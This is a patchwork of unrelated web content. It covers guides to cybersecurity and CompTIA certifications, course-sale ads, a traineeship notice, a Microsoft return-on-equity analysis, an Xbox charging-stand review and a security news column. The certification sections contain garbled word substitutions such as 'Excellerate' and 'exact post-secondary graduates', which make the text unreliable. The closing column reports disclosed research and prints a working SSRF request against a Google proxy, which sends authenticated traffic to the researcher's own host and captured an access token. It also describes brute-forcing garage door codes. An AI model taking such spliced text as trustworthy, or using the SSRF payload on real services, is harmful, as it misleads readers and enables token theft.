Looking for a career change in the new year? There’s no better time to consider a career in cybersecurity: U.S. businesses and government agencies are spending billions of dollars each year to protect their data and assets from malicious attacks, with Forbes reporting that $170 billion will be spent worldwide by 2020.
With the demand for qualified security professionals soaring, certification is a logical way for you to verify your skills and knowledge, and to get your resume noticed. Here are five certifications that can help launch your cybersecurity career.
Of the certifications featured in this article, the MTA Security Fundamentals is the most “entry-level” one of the bunch. Aimed at high school and early college students, as well as those in the workforce who are looking to change careers, the MTA Security Fundamentals recognizes knowledge of core security principles as well as the basics of operating system, network and software security. To achieve certification, you must pass a single exam, which costs $127.
To Excellerate your chances of achieving the MTA Security Fundamentals certification, Microsoft recommends that you have some hands-on experience with Windows Server, Windows-based networking, firewalls and other common security products.
Folks in the security industry know ISACA for such long-running certificates as its Certified Information Security Manager (CISM) and Certified Information Systems Auditor (CISA) and similar certifications, all of which grant intermediate to advanced credentials. The CSX Cybersecurity Fundamentals Certificate is relatively new to the ISACA certification program and was designed to fill the entry-level niche. Geared toward exact post-secondary graduates and those seeking career changes, this certificate covers five cybersecurity-related domains: concepts; architecture principles; network, system, application and data security; incident response; and security of evolving technology.
The single exam costs $150, and the certificate doesn’t expire or require periodic recertification.
Perhaps the most well-known entry-level security certification is the Security+, which covers a wide array of security and information assurance topics, including network security, threats and vulnerabilities, access controls, cryptography, risk management principles, and application, host and data security. The certification meets U.S. Department of Defense Directive 8570.01-M requirements — an important item for anyone looking to work in IT security for the federal government — and complies with the Federal Information Security Management Act (FISMA).
CompTIA recommends that candidates have two years of relevant experience and achieve the Network+ credential before taking the Security+ exam. At $311, this exam lands roughly midway between least and most expensive, compared to other entry-level certifications. The Security+ leads to such jobs as security administrator, security specialist and network administrator, among others.
GIAC gears the GISF toward system administrators, managers and information security officers who need a solid overview of information assurance principles, defense-in-depth techniques, risk management, security policies, and business continuity and disaster recovery plans. The courses covered on the single GISF exam are similar to those for the CompTIA Security+, but GISF is considered to be more challenging. GIAC exams in general require test takers to apply knowledge and problem-solving skills, so hands-on experience that has been gained through training or on-the-job experience is recommended.
If you take a SANS training course and then sit for the GISF exam, the exam cost alone is $689. Taking the exam without completing training, referred to as a “certification attempt” by GIAC, bumps the exam cost to a whopping $1,249. GIAC includes two practice exams in the certification-attempt package.
After achieving the GISF, consider pursuing the GIAC Security Essentials (GSEC), an intermediate-level certification that takes a big step beyond foundational information security concepts.
The (ISC)2 Certified Information Systems Security Professional (CISSP) is probably the most recognizable and popular security certification today. But (ISC)2 offers several security-related certifications, with the ANSI-accredited SSCP filling the entry-level slot. The SSCP prepares you for such jobs as systems security analyst, network security engineer and security administrator, which typically start at the junior level if you don’t already have technical or engineering-related information technology experience.
To achieve the SSCP, you must pass a single exam that includes questions that span seven common body of knowledge (CBK) domains: (1) Access Controls, (2) Security Operations and Administration, (3) Risk Identification, Monitoring, and Analysis, (4) Incident Response and Recovery, (5) Cryptography, (6) Network and Communications Security, and (7) Systems and Application Security.
To ensure that you have sufficient hands-on security knowledge before taking the exam, (ISC)2 recommends that you attend training courses or conference workshops, participate in webinars, and read white papers and books.
The exam costs $250, and (ISC)2 offers a variety of study resources for purchase on its website.
Regardless of which certification seems like a best fit for you, be prepared to devote ample self-study time to the effort. Many test takers prefer to use a top-rated study guide along with some practice exams and flash cards when preparing for a certification exam. If your learning style is more conducive to formal instructor-led training, factor the costs and required time into your plans. Although training costs vary by certification, they typically run from $400 to over $5,000, depending on whether you choose online, virtual classroom or in-classroom delivery.
There's a growing shift from physical infrastructure to cloud computing, which has boosted demand for cloud-certified professionals. So if you're looking for the next step in your IT career, chasing the cloud can provide job security and a handsome salary, with engineers averaging more than $120,000 annually(Opens in a new window).
As with any IT career, you need to earn your credentials, and The Complete Microsoft Azure Certification Prep Bundle can help. This 10-course bundle of training is presented by instructors specializing in cloud technologies; lessons provide comprehensive prep material from beginner to advanced-level certification exams, allowing you to enter the cloud field without prior experience.
That said, if you're new to cloud computing, AZ-900: Microsoft Azure Fundamentals exam Quick Prep may serve you well. It introduces courses such as Azure Cloud's different pricing and support options, making it an excellent primer if you hope to work in the industry in a non-technical role. From there, the bundle covers exams for the AZ-103, AZ-203, AZ-300, and AZ-301 certifications, which endorse skills in designing and implementing Azure infrastructure.
It also offers supplementary courses that don't necessarily focus on a certification exam, but cover valuable skills nonetheless. For example, Azure MasterClass: Analyze Data with Azure Stream Analytics illustrates how to create queries and data analysis pipelines, while Azure MasterClass: Manage Storage & Disks in the Cloud with Azure Storage covers concepts such as utilizing storage pools as an efficient and scalable disk management system.
PCMag readers can get more than 50 hours of training via the The Complete Microsoft Azure Certification Prep Bundle, on sale for $39—97% off the $1,839 MSRP.
Prices subject to change.
Sign up for our expertly curated Daily Deals newsletter for the best bargains you’ll find anywhere.
Headquartered near Chicago, CompTIA is a nonprofit trade association made up of more than 2,000 member organizations and 3,000 business partners. Although the organization focuses on educating and certifying IT professionals, CompTIA also figures prominently in philanthropy and public policy advocacy.
CompTIA’s vendor-neutral certification program is one of the best recognized in the IT industry. Since CompTIA developed its A+ credential in 1993, it has issued more than two million certifications.
In early 2018, CompTIA introduced its CompTIA Infrastructure Career Pathway. While you’ll still see the same familiar certifications that form the bedrock of the CompTIA certification portfolio, this new career pathway program more closely aligns CompTIA certifications to the real-world skills that IT professionals need to ensure success when managing and supporting IT infrastructures.
CompTIA certifications are grouped by skill set. Currently, CompTIA certs fall info four areas: Core, Infrastructure, Cybersecurity and Additional Professional certifications.
CompTIA IT Fundamentals+
CompTIA IT Fundamentals+ is ideal for beginners with a basic understanding of PC functionality and compatibility as well as familiarity with technology topics, such as hardware basics, software installation, security risks and prevention, and basic networking. It’s also ideal as a career planning or development tool for individuals beginning their IT careers or those seeking to make a career change. A single exam is required to earn the credential. CompTIA launched a new IT Fundamentals+ exam (Exam FC0-U61) in September 2018. This new exam focuses on computing basics, database use, software development and IT infrastructure. The English version of the prior exam (Exam FC0-U510) retires on July 15, 2019. Exams in other languages retire on December 1, 2019.
The CompTIA A+ certification has been described as an “entry-level rite of passage for IT technicians,” and for a good reason. This certification is designed for folks seeking a career as a help desk, support, service center or networking technician. It covers PC and laptop hardware, software installation, and configuration of computer and mobile operating systems. A+ also tests a candidate’s understanding of basic networking, troubleshooting and security skills, which serve as a springboard for CompTIA networking or security certifications or those offered by other organizations.
According to CompTIA, more than one million IT professionals hold the A+ certification. The A+ is required for Dell, Intel and HP service technicians and is recognized by the U.S. Department of Defense. CompTIA released new “Core” exams for the CompTIA A+ credential on January 15, 2019. These new exams provide additional focus on operational procedure competency and baseline security topics. Candidates must pass the Core 1 (exam 220-1001) and Core 2 (Exam 220-1002) exams. The Core 1 exam targets virtualization, cloud computing, mobile devices, hardware, networking technology and troubleshooting. The Core 2 exams focuses on installation and configuring operating systems, troubleshooting software, operational procedures and security.
Many IT professionals start with the A+ certification. While the A+ credential is recommended, if you have the experience and don’t feel a need for the A+, you can move directly to the CompTIA Network+ certification. It’s geared toward professionals who have at least nine months of networking experience. A candidate must be familiar with networking technologies, media, topologies, security, installation and configuration, and troubleshooting of common wired and wireless network devices. The Network+ certification is recommended or required by Dell, HP and Intel, and is also an accepted entry-point certification for the Apple Consultants Network. The Network+ credential meets the ISO 17024 standard and just like the A+, it is recognized by the U.S. DoD. A single exam is required to earn the certification.
CompTIA Security+ covers network security concepts, threats and vulnerabilities, access control, identity management, cryptography, and much more. Although CompTIA does not impose any prerequisites, the organization recommends that cert candidates obtain the Network+ credential and have at least two years of IT administration experience with a security focus. To obtain the Security+ certification candidates must pass on exam, SY0-501.
The CompTIA Linux+ Powered by LPI certification is aimed at Linux network administrators with at least 12 months of Linux administration experience. Such experience should include installation, package management, GNU and Unix commands, shells, scripting, security and more. The A+ and Network+ certifications are recommended as a preamble to this certification but are not mandatory. Candidates must pass two exams (LX0-103 and LX0-104) to earn this credential. The exams must be taken in order, and candidates must pass exam LX0-103 before attempting LX0-104. In 2018, CompTIA began testing a new beta exam (XK1-004). The beta exam offering ended October 22, 2018. New exams generally follow beta exam tests so interested candidates should check the Linux+ web page for updates.
As the cloud computing market continues to grow by leaps and bounds, the CompTIA Cloud+ certification has been keeping pace. This certification targets IT professionals with two to three years of experience in storage, networking or data center administration. A single exam, CV0-002, is required. It tests candidates’ knowledge of cloud technologies, hybrid and multicloud solutions, cloud markets, and incorporating cloud-based technology solutions into system operations.
CompTIA Server+ aims at server administrators with 18 to 24 months of experience with server hardware and software technologies, and the A+ certification is recommended. The Server+ credential is recommended or required by HP, Intel and Lenovo for their server technicians. It is also recognized by Microsoft and the U.S. Department of Defense (DoD). A single exam, SK0-004, is required to achieve this credential.
CompTIA Cybersecurity Analyst (CySA+)
As cybercrime increases, the requirement for highly skilled information security analysts will continue to increase as well. The Bureau of Labor Statistics (BLS) reports anticipated growth of 28 percent for information security analysts between 2016 and 2026, the fastest rate of growth for all occupations. One of the newer additions to the CompTIA certification portfolio is the Cybersecurity Analyst (CySA+) certification. The CySA+ credential is specifically designed to meet the ever-growing need for experienced, qualified information security analysts.
CySA+ credential holders are well versed in the use of system threat-detection tools, as well as the use of data and behavioral analytics to secure applications and systems from risks, threats and other vulnerabilities. CySA+ certification holders are not only able to monitor network behavior, but analyze results and create solutions to better protect against advanced persistent threats (APTs), intrusions, malware and the like.
CompTIA describes CySA+ as a bridge cert between the Security+ credential (requiring two years’ experience) and the master-level Advanced Security Practitioner Certification (CASP), which requires 10 years of experience. To earn a CySA+, candidates must pass a performance-based exam.
CompTIA Advanced Security Practitioner+ (CASP+)
While CompTIA no longer uses the “master” designation, the highly sought-after CASP+ certification is most certainly a master-level credential. Targeting practitioners, CASP is the only performance-based, hands-on certification currently available from CompTIA. This certification is designed for seasoned IT security professionals who plan, design and implement security solutions in an enterprise environment.
Although this certification doesn’t impose any explicit prerequisites, it’s not a bad idea to earn the Network+ and Security+ certifications before tackling the CASP exam. You should also have 10 years of IT administration experience plus a minimum of five years of technical security experience (thus securing this certification’s place as a “master” credential).
Booz Allen Hamilton, Network Solutions and Verizon Connect, among other companies, require CASP+ certification for certain positions. The U.S. Army and U.S. Navy also accept CASP+ as an industry-based certification required by employees and contractors who perform IT work in DoD data centers. The CASP+ certification requires that candidates pass the CAS-003 exam, which consists of 90 multiple-choice and performance-based questions.
The existing additional to the CompTIA certification family is the CompTIA PenTest+. An intermediate-level credential, PenTest+ is designed to complement the CySA+. While CySA+ is defensive in nature (focusing on threat detection and response), the PenTest+ credential is offensive, focusing on using penetration testing to identify and manage network vulnerabilities across multiple spectra.
There are no mandatory prerequisites, but the Network+ and Security+ (or equivalent skills) are highly recommended, along with a minimum of two years of information security experience. Candidates pursuing the cybersecurity career path may take the PenTest+ or CySA+ credential in any order.
The exam was released in July 2018, and is focused on communicating and reporting results, analyzing data, conducting penetration testing and scanning, and planning assessments. The exam also tests a candidate’s knowledge of legal and compliance requirements.
The CompTIA Project+ certification focuses exclusively on project management and is ideal for project managers who are familiar with project lifecycles from planning to completion, who can finish a project on time and under budget. Project managers interested in this certification should have at least one year of project management experience overseeing small- to medium-sized projects. The Project+ credential requires that candidates pass a multiple-choice exam, PK0-004.
CompTIA Cloud Essentials
The CompTIA Cloud Essentials certification is geared toward individuals who understand the business aspects of cloud computing and how to move from in-house to cloud storage. In addition, they should be familiar with the impacts, risks and consequences of implementing a cloud-based solution. A single exam is required to earn the credential.
The CompTIA Certified Technical Trainer (CTT+) certification is perfect for anyone interested in technical training. It covers instructor skills, such as preparation, presentation, communication, facilitation and evaluation, in vendor-neutral fashion. Adobe, Cisco, Dell, IBM, Microsoft and Ricoh all recommend CTT+ to their trainers and accept it in lieu of their own in-house trainer certifications.
Two exams are required for the CTT+ credential: CompTIA CTT+ Essentials (TK0-201) and either CTT+ Classroom Performance Trainer (TK0-202) or CTT+ Virtual Classroom Trainer (TK0-203).
The CTT+ Classroom Performance Trainer and CTT+ Virtual Classroom Trainer are performance-based exams. In this case, you must submit a video or recording of your classroom (or virtual classroom sessions), and complete a form that documents your training preparation, delivery and student evaluations.
In addition to certification levels, CompTIA groups its certifications into several career paths:
The CompTIA Certifications page lets you pick a certification level and/or a career path and then returns a list of certifications to focus on. For example, one of the most popular career paths in IT is network administration. CompTIA’s Network and Cloud Technologies career path offers numerous certifications that can help you advance your network administration career, such as IT Fundamentals+, A+ and Network+ (Core certs), along with Cloud+ and Linux+ (Infrastructure certifications) and Cloud Essentials.
Those interested in network security (one of the fastest growing fields in IT) should consider the certifications in CompTIA’s Information Security career path. This includes all four of the Core credentials (IT Fundamentals, A+, Network+ and Security+) along with all cybersecurity certifications (CySA+, PenTest+ and CASP+).
CompTIA provides a comprehensive IT certification roadmap that encompasses certifications from CompTIA as well as a variety of other organizations, including Cisco, EC-Council, Microsoft, (ISC)2, ISACA, Mile2 and more.
Because CompTIA credentials do not focus on a single skill (such as networking or virtualization), CompTIA credential holders may find themselves in a variety of job roles depending on their experience, skill levels and areas of interest. Here are just a few of the possible careers that CompTIA credential holders may find themselves engaged in:
While the examples above are by no means exhaustive, they provide an overview of some available careers. Your career choices are limited only by your interests, imagination and determination to achieve your personal goals.
CompTIA provides various and extensive training options, including classroom training, study materials and e-learning. A wide range of CompTIA Authorized Training Provider Partners (CAPPs), such as Global Knowledge, Learning Tree International and more, operate all over the world. Classroom and online/e-learning offerings range in cost from $2,000 to $4,000, depending on the particulars. Visit the CompTIA Training page for more details.
CompTIA works with third parties to offer self-study materials (the search tool is available here). Content that has been through a vetting process is branded with the CompTIA Approved Quality Content (CAQC) logo. Other materials that allow you to study at your own pace, such as audio segments, lesson activities and additional resources, are available through the CompTIA Marketplace.
Finally, every CompTIA A+, Linux+, Network+, Server+, Security+ and IT Fundamentals+ certification candidates must check out CertMaster, CompTIA’s online test prep tool. CertMaster helps you determine which courses you know well and those you need to brush up on, and suggests training to help you fill in the gaps.
In the hands of experts, Microsoft Excel can do more than just sort numbers, but you don't need to be a math whiz to use this spreadsheet software to its fullest extent. There's a condensed-but-comprehensive course that can teach anyone Microsoft Excel—and it's on sale for $19.99.
Excel is a popular piece of software for everyday users, and there are no shortage of online tutorials. However, this training isn't just a YouTube run-through on specific aspects of the tool; it's a comprehensive eight-hour masterclass taught by experienced computer tech Warrick Klimaytys, who, when it comes to Excel, breaks down even the most complex functions into fun lessons.
Starting with the fundamentals, he takes students through the basics of a spreadsheet, pointing out what you need to know about the interface. Moving forward, lessons tackle functions, formulas, macros, and other time-saving tricks that will turn you into the office Excel expert. Classes even highlight ways to save a ton of time managing your home finances; specific lessons include using Excel to calculate your mortgage.
Excel is about more than just spreadsheets, and you'll soon learn how to turn that data into 3D charts and maps that can make your next business proposal more accurate and attractive. By the time you reach the final lessons, you'll know how to collect vast piles of data and turn it into an actionable plan.
The Microsoft Excel: Beginner to Advanced course spans more than 90 tutorials over eight hours, and PCMag readers can get it on sale for $19.99—88% off the $175 MSRP.
Prices subject to change.
Sign up for our expertly curated Daily Deals newsletter for the best bargains you’ll find anywhere.
The GRETB Training centre Mervue is currently recruiting for the IT Support Specialist Traineeship.
This exciting Traineeship will commence in September 2022 and offers trainees excellent opportunities to gain Microsoft and CompTIA certifications. The certifications delivered are globally recognised and provide a key knowledge base for anyone wanting to begin a career in IT Support.
The 46-week programme also includes 16 weeks work experience to gain real life skills in the industry.
Certifications include: CompTIA A+, CompTIA Network+, CompTIA Security+, Microsoft Azure Fundamentals and Microsoft 365 Administration. In addition to this Trainees will learn a number of non-technical skills.
The Traineeship commences Monday September 5 and is full time for 46 weeks. Potential trainees will be required to sit an interview and aptitude test with the GRETB prior to being offered a place on the traineeship.
Interviews and the course itself, will run in compliance with Covid 19 guidelines at the time. It is envisaged that interviews and the course will be run in the centre and the course ran on a full time in-centre basis.
The trainees will be expected to secure their own work experience with organisations for the 16-week period and may be expected to sit interviews with relevant organisations. Assistance and guidance will be provided by the GRETB.
Demand from employers for people with these skill sets is high at present and the right people will have great opportunity to secure full time employment.
If you are an employer and want to get involved or find out more about how this Traineeship can help your business, please get in touch with us.
For more information and how to apply for potential trainees or employers, please visit https://bit.ly/TecSuppS or www.fetchcourses.ie and search for course reference 342426.
You may also call 091 706200 or email [email protected]
Microsoft (NASDAQ:MSFT) has had a rough three months with its share price down 14%. However, a closer look at its sound financials might cause you to think again. Given that fundamentals usually drive long-term market outcomes, the company is worth looking at. In this article, we decided to focus on Microsoft's ROE.
Return on equity or ROE is a key measure used to assess how efficiently a company's management is utilizing the company's capital. In other words, it is a profitability ratio which measures the rate of return on the capital provided by the company's shareholders.
View our latest analysis for Microsoft
The formula for return on equity is:
Return on Equity = Net Profit (from continuing operations) ÷ Shareholders' Equity
So, based on the above formula, the ROE for Microsoft is:
44% = US$72b ÷ US$163b (Based on the trailing twelve months to March 2022).
The 'return' is the income the business earned over the last year. So, this means that for every $1 of its shareholder's investments, the company generates a profit of $0.44.
So far, we've learned that ROE is a measure of a company's profitability. Depending on how much of these profits the company reinvests or "retains", and how effectively it does so, we are then able to assess a company’s earnings growth potential. Generally speaking, other things being equal, firms with a high return on equity and profit retention, have a higher growth rate than firms that don’t share these attributes.
To begin with, Microsoft has a pretty high ROE which is interesting. Secondly, even when compared to the industry average of 12% the company's ROE is quite impressive. As a result, Microsoft's exceptional 28% net income growth seen over the past five years, doesn't come as a surprise.
Next, on comparing Microsoft's net income growth with the industry, we found that the company's reported growth is similar to the industry average growth rate of 25% in the same period.
Earnings growth is a huge factor in stock valuation. It’s important for an investor to know whether the market has priced in the company's expected earnings growth (or decline). By doing so, they will have an idea if the stock is headed into clear blue waters or if swampy waters await. What is MSFT worth today? The intrinsic value infographic in our free research report helps visualize whether MSFT is currently mispriced by the market.
The three-year median payout ratio for Microsoft is 33%, which is moderately low. The company is retaining the remaining 67%. So it seems that Microsoft is reinvesting efficiently in a way that it sees impressive growth in its earnings (discussed above) and pays a dividend that's well covered.
Besides, Microsoft has been paying dividends for at least ten years or more. This shows that the company is committed to sharing profits with its shareholders. Our latest analyst data shows that the future payout ratio of the company is expected to drop to 21% over the next three years. Still forecasts suggest that Microsoft's future ROE will drop to 35% even though the the company's payout ratio is expected to decrease. This suggests that there could be other factors could driving the anticipated decline in the company's ROE.
On the whole, we feel that Microsoft's performance has been quite good. In particular, it's great to see that the company is investing heavily into its business and along with a high rate of return, that has resulted in a sizeable growth in its earnings. Having said that, the company's earnings growth is expected to slow down, as forecasted in the current analyst estimates. To know more about the latest analysts predictions for the company, check out this visualization of analyst forecasts for the company.
Have feedback on this article? Concerned about the content? Get in touch with us directly. Alternatively, email editorial-team (at) simplywallst.com.
This article by Simply Wall St is general in nature. We provide commentary based on historical data and analyst forecasts only using an unbiased methodology and our articles are not intended to be financial advice. It does not constitute a recommendation to buy or sell any stock, and does not take account of your objectives, or your financial situation. We aim to bring you long-term focused analysis driven by fundamental data. Note that our analysis may not factor in the latest price-sensitive company announcements or qualitative material. Simply Wall St has no position in any stocks mentioned.
The Michigan Tech Data Science MS provides a broad-based education in data mining, predictive analytics, cloud computing, data-science fundamentals, communication, and business acumen. You'll gain a competitive edge through domain-specific specialization in disciplines of science and engineering, and you'll have the freedom to explore and develop your own interests in one or more domains.
Razer is one of the leading manufacturers of hardware and accessories in the gaming space, and is continuing to expand its lineup into console spaces. In 2021, Razer acquired Controller Gear, an accessory company known for its excellent Xbox charging stands. Razer has since released an updated, rebranded version of that charging stand, but it's still built on a design that's over four years old.
Can the Razer Universal Quick Charging Stand for Xbox compete with the best Xbox charging accessories and stands? Despite the aging foundation upon which it's built, Razer's charging stand is still an excellent, premium accessory that looks and functions well. You'll have to pay a little extra for the privilege of fit and finish, but the resulting product is worth the cost.
Razer is experienced at ensuring its products are available in as many places as possible with ample supply, and the Quick Charging Stand for Xbox is no exception. Players can pick up the premium charging accessory from a variety of retailers, including Razer, Amazon, Microsoft, and Best Buy, with prices starting at $40 for the numerous basic colors.
Matching charging stands for special or limited-edition controllers, like the Forza Horizon 5 Limited Edition Xbox Wireless Controller or the Xbox 20th Anniversary controller, can increase the price to $50. Razer also offers Limited Edition Xbox Wireless Controller & Quick Charging Stand duos themed after popular franchises like Marvel, Star Wars, and more. These exclusive controller pairings are often quite expensive, reaching prices all the way up to $200, but they're an amazing addition to any collection.
Each Razer Universal Quick Charging Stand for Xbox comes equipped with the stand itself, a high-quality USB Type-A-to-Type-C cable, a single rechargeable battery pack for your controller, and two rear battery doors (one for Xbox One Wireless Controllers, and one for Xbox Series X|S Wireless Controllers).
The Razer Universal Quick Charging Stand for Xbox (what a mouthful of a name) is built on the foundation originally created by Controller Gear, now a part of Razer. The resulting product shares countless similarities with its predecessor, with only a handful of minor differences setting the two apart. Fortunately, Controller Gear's Xbox charging stands were excellent, and already counted among the best options for players.
Razer's gently tweaked entry in the space will be instantly familiar to anyone who has owned a Controller Gear stand, and this alone will likely dissuade would-be buyers from "upgrading" to the new model. In the image above, Razer's stand is on the left and Controller Gear's is on the right. Could you tell the difference? These similarities are likely enough to immediately dissuade anyone considering an "upgrade," but other buyers are still well served by the Razer Quick Charging Stand.
From a design perspective, Razer certainly didn't mess with the established formula. This charging stand is impeccably built using high-quality plastic that looks and feels identical to that used in Microsoft's controllers, with no concerning creaks, gaps, or moving parts to be found. Everything simply works as intended, which is exactly what you want from your charging stand.
Razer's Quick Charging Stand is fully compatible with Xbox One Wireless Controllers, Xbox Series X|S Wireless Controllers, and Xbox Design Lab controllers. Intelligently placed magnets (which feel slightly stronger and more secure than my older Controller Gear stand) ensure your controller always clicks into place, and a front-facing indicator light informs you when your controller is charging and when it's fully charged.
A grippy rubber border encircling the product info on the bottom keeps the charging stand firmly in place, even when removing or placing your controller. I also found this area to be a mild improvement over the Razer Quick Charging Stand's predecessor, with less sliding and shifting observed.
On the rear, Razer ditched the proprietary barrel charger in favor of the more universal and far more appealing USB Type-C standard. Razer also paired its charging stand with a surprisingly high-quality USB Type-A-to-Type-C cable. With this design, you can plug the charging stand directly into your Xbox console or into the wall with a charging brick (that, unfortunately, isn't included in the box).
When it comes to aesthetics, you'll be hard-pressed to find a better-looking charging stand than this one. Razer offers its Quick Charging Stand in a wide variety of colors and patterns that match the official colorways and designs of Microsoft's Xbox Series X|S Wireless Controllers, including limited and special edition models. You can almost always find a color that matches your controller, even if you pick up a custom controller from Xbox Design Lab.
Of course, none of this matters if the fundamentals — the charging experience and battery life — don't match the rest of the package. The Razer Universal Quick Charging Stand for Xbox does deliver in this department, however, with the included battery pack offering excellent endurance that kept me going through several all-day playing sessions (surpassing other charging accessories I've tried in the past).
I wasn't able to verify the long-term durability of the battery, of course, but my older Controller Gear charging stand still offered fantastic battery life after over a year of continued use, and I suspect the Razer Quick Charging Stand will match this.
As for charging speeds, this is another area in which Razer's offering is identical to its predecessor. That is to say, it's perfectly acceptable, and ensures you'll never have to wait long to be back in the game. Smaller batteries don't need as much juice to charge up quickly, so I didn't have any complaints with Razer's "Quick Charging" claims. Just don't expect this charging stand to push the standards set by this design years ago.
All of the faults with the Razer Universal Quick Charging Stand for Xbox can be reduced down to a few elements — its similarities to its Controller Gear predecessor and its expensive price tag counting first among them. This is a solid product, but it's also practically identical to the product that came before it, which in turn was almost identical to a design introduced nearly five years ago in 2017.
If you already possess one of those Controller Gear charging stands, you have little reason to purchase Razer's offering (unless you're wanting a stand that matches a new controller or something has stopped working). Better grippiness, slightly stronger magnets, and a new power cable aren't significant enough distractions from a familiar design that still only charges and displays one controller at a time and costs more than many of its competitors.
Razer also doesn't include a charging brick in the box. This is mostly fine, especially since you can now plug it directly into your Xbox console, but it means digging up or purchasing a charging brick if you'd rather plug it into an outlet. All of these flaws are minor; this is one of the most well-rounded options for anyone looking for a new charging stand that works and looks great. Still, bear in mind that while this is a "new" product with its full retail price intact, much of it doesn't feel particularly new.
There aren't many products that offer exactly what Razer is with its Universal Quick Charging Stand for Xbox. Despite its aging foundation, this charging stand is undeniably premium, delivers on all the fundamentals with aplomb, and looks rather dashing when paired with practically any Xbox Wireless Controller.
You can pick up an Xbox Rechargeable Battery kit, which will offer similar battery life and endurance, but you'll lose out on an included way to display your controller while charging, and be forced to plug your controller in to top it off. Alternatively, the PowerA Dual Charging Station for Xbox lets you charge and display two Xbox Wireless Controllers at nearly half the price of Razer's charging stand, although you'll have to compromise on design, build quality, battery life, and charging speeds.
You should buy this if ...
You should not buy this if ...
The Razer Universal Quick Charging Stand for Xbox offers a list of flagship features as long as its name, wrapped in a high-quality, well-built package that promises to stand the test of time and look good while doing so. Regardless of how old this design is, and how many of those features are shared by past versions, Razer's charging stand is one of the best and most premium charging accessories for Xbox Wireless Controllers.
Of course, you have to be using an Xbox One or Xbox Series X|S Wireless Controller, want to display it while charging it, and be okay with paying a little extra for Razer's premium polish. If you just want your controller to be rechargeable, you have multiple controllers to display at once, or you don't place much import on the aesthetics, there are certainly more affordable ways to get the job done than the Razer Quick Charging Stand.
It helps that Razer offers its charging stand solution at practically any retailer you might peruse, with a myriad of color options from which to choose. No matter the color or design of your Xbox Wireless Controller, you can rest assured that the Razer Universal Quick Charging Stand for Xbox will display it proudly, offer a best-in-class charging and battery experience, and reliably do so for years to come.
Razer's rebranded Controller Gear charging stand doesn't change much from its predecessor, but it's still an excellent charging accessory possessing a fantastic design, feature set, and battery life. If you can stomach the premium price tag, there are few competitive options.
If you had the misfortune of running a Microsoft Exchange server this past week, then you don’t need me to tell you about the Y2K22 problem. To catch rest of us up, when Exchange tried to download the first malware definitions update of 2022, the version number of the new definitions triggered a crash in the malware detection engine. The date is represented as the string
2201010001, where the first two digits represent the year. This string gets converted to a signed long integer, which maxes out at
2,147,483,647. The integer overflows, and the result is undefined behavior, crashing the engine. The server fails safe, not processing any messages without a working malware engine, which means that no e-mail gets through. Happy new year!
Dialing 911 for emergency services is pretty much the worst time for a software bug to manifest itself. Google just fixed such a bug in the January Android update. It’s one of those odd unintended app interactions — in this case Microsoft Teams triggering the Android bug. If the Teams app is installed, but no account logged in, Teams creates and registers a new
PhoneAccount object on every launch. This sounds like it should be rare, but Teams on Android is also notorious for logging out the user spontaneously. When you dial 911, Android runs a routine to determine which
PhoneAccount should be used to route the call, and solves ties by comparing hashes. That comparison is just a naive subtraction, meaning that there’s a 50% chance in getting a negative result. This was unanticipated, leading to the crash.
Reverse engineering a 30-year-old wireless authorization scheme may not be the most attention grabbing feat, but sometimes the journey is its own reward. [Maxwell Dulin] brings us the story, and this journey is certainly worth it. The fundamentals of this hack are definitely still viable, starting with looking at the hardware. The garage door is synced to the garage door opener by holding a pushbutton on the receiver while sending a code. Inside the opener, there are nine dip switches, each with three positions. What do they do? He pulled out his trusty SDR to grab the traffic and try to decode the signals. Inspectrum and GNU Radio were the heroes here, giving insight into this simple auth scheme. The conclusion on this real garage door? You can brute force an unknown code by sending every possible combo, and it only takes 104 minutes.
If you’re a sysadmin, you know that some problems call for immediate action. If you ran Java servers, the Log4J vulnerability was a fire test of your response protocol. The time between public disclosure and whenever you heard about it, may have been enough to trigger disaster. While there are multiple bug reporting services and frameworks, nothing quite fits this niche use case: notifying you as soon as possible that your hair may truly be on fire. That unfilled niche bugged [Matthew Sullivan], who has announced a new project, Bug Alert. It’s all open source, so you can host your own instance if you really want to. You can opt to get a tweet, text, or even phone call. This has the potential to be a useful tool, take a look!
I feel like I need to make Bug Alert trigger a certain Weird Al song…
[David Schütz] was searching for obscure Google APIs, and discovered
jobs.googleapis.com, which you can demo yourself. That demo is interesting, because it’s not a fully fleshed-out service, but talks to the real back-end. The requests go through a proxy,
cxl-services.appspot.com, which handles the authentication step for the demo page. If he could trigger a Server-Side Request Forgery (SSRF), he might be able to get at the authenticated requests, and maybe trick the proxy into sending traffic on his behalf. URL parsing is hard. The trick that worked? A backslash in the url.
GET /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP/1.1
With an access token in hand, [David] started carefully exploring other Google APIs to see what this token gave him access to. He gives the warning we’ve covered before, be careful how far you push. He could have reported the bug right away, but wanted to confirm that he actually had a live access token. After confirming the token worked for read access, he turned in the finding, and netted a very nice $3133.70, as well as an extra $1000 for a good report and the careful look at lateral movement. That’s all there is to it, right? Nope. Just before the 90 day disclosure deadline passed, [David] discovered a fix bypass. Adding any text between the backslash and @ was enough to break it. Another $3133.70. Just for fun, he probed the old URLs, that shouldn’t be in service after the fix. Yep, he found yet another security token, and netted $3133.70. This Zombie SSRF still isn’t dead, as evidenced on Twitter:
I told you, its unfixable! @n1nj4sec already bypassed the fix. So cool! Will you be the 4th one to bypass it and get $3k? 😎 Parsing a URL is really hard. pic.twitter.com/5xmg5tbybw
— David Schütz (@xdavidhu) January 2, 2022
If you haven’t set your WordPress instance to update automatically, it’s time to go check for the latest version. There are four potentially dangerous issues here, though the details are scarce at this point. First up is a Cross-Site Scripting vulnerability in post slugs, the part of the URL that matches the post name. The second issue mentioned is object injection in some multisite configurations. The last two vulnerabilities are SQL injections, definitely worthy of the “What Year is It?” meme.